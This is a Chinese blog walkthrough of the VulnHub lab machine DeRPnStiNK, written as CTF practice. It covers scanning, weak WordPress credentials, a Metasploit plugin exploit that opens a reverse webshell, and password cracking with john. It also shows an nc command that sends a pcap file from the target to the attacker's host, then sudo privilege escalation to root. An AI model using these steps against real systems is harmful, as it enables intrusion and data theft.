• vulnhub靶场DeRPnStiNK解题思路


    解题使用工具:

    railgun、nmap、

    dirb、ssh、msf5、john、lftp(lftp kali2020-4-21默认没有安装)

    靶场链接地址:

    链接:https://pan.baidu.com/s/1pa6Mv3Xdi1qXprVK7-_CFw
    提取码:0l27
    复制这段内容后打开百度网盘手机App,操作更方便哦

    1.受限使用扫描器探测web服务(使用到的工具是railgun、nmap):

     注意:同时也可以使用nmap等一下端口服务扫描工具进行扫描

    2.访问http://192.168.8.177:80/服务出现如下界面(找到第一flag,这个hash值没有破解必要):

    3.看了一圈主页代码没有发现什么重要信息,使用dirsearch和dirb目录爆破工具进行爆破结果

    访问robots.txt结果如下:

     

    使用kali中的dirb工具爆破结果

    4. 在本地主机hosts文件中添加(192.168.8.177 derpnstink.local),ip地址是目标主机ip

     发现此系统使用的wordpress框架

    wordpree默认后台登录wp-admin

     5. 弱口令登录admin/admin,发现不是最高权限。

    未进行:存在上传点(另外一种解题方法):参考链接-https://blog.csdn.net/CSDNPM250/article/details/105837491

     

    6.使用kali中的wpscan扫描web站点框架漏洞,发现存在slideshow-gallery漏洞,使用msf5进行进行利用。

    7.利用wordpress框架漏洞反弹webshell

    配置完成,成功利用成功反弹回webshell,

     

    通过程序源码的配置文件,查找数据库phpmyadmin数据用户名和密码。

    8.通过查找源码发现数据库用户名和密码登录数据库系统发现flag2值

    再次在数据库中找到用户名密码表:

     9.使用john解密phpmyadmin另外一个用户(unclestinky)的密码:(猜测为hash加密方式),通过解密可以得出:unclestinky密码为:wedgie57

    10.使用unclestinky/wedgie57登录后台管理系统,通过找到flag2的值

    11.通过反弹shell查看/etc/passwd文件查找到三个用户名

    通过三个用户分别登录ssh和ftp,最终确定stinky登录ftp共享文件空间。

    从stinky用户中获取ssh登录key

     

    rockyou.txt.gz 需要进行解压(gzip -d /usr/share/wordlists/rockyou.txt)

    12. 通过获取ssh文件下key.txt 登录ssh获取flag3

     

    13.通过nc将Documents文件下pcap文件发送攻击机上

    kali执行:nc -l -p 9999 > derp.pcap
    目标靶机执行:nc 192.168.56.102 9999 < derpissues.pcap

    通过kali上wireshark打开数据包分析,发现之前的再数据库中unclestinky破解用户名密码相同。

    同时还发现mrderp的密码为derpderpderpderpderpderpderp

    15.使用mrderp用户登录ssh,之后再Desktop文件sudoer文件有问题

     

    根据提示的意思是当前用户有sudo提权相关的提示,可以访问https://pastebin.com/RzK9WfGw 得到帮助信息

    通过查找没有发现binaries文件下没有derpy文件,所以创建一个新文件。

    通过创建 的derpy.sh文件运行提权

     再root文件下发现flag4

  • 相关阅读:
    【HDU3032】Nim or not Nim?(博弈论)
    【BZOJ1022】小约翰的游戏(博弈论)
    【HDU1848】Fibonacci again and again(博弈论)
    【POJ1704】Georgia and Bob(博弈论)
    【BZOJ1299】巧克力棒(博弈论,线性基)
    【Luogu2197】NIM游戏(博弈论)
    【洛谷2252&HDU1527】取石子游戏(博弈论)
    【HDU1846】Brave Game(博弈论)
    【CF888G】Xor-MST(最小生成树,Trie树)
    长链剖分学习笔记
  • 原文地址:https://www.cnblogs.com/coolguo/p/14421217.html
Copyright © 2020-2023  润新知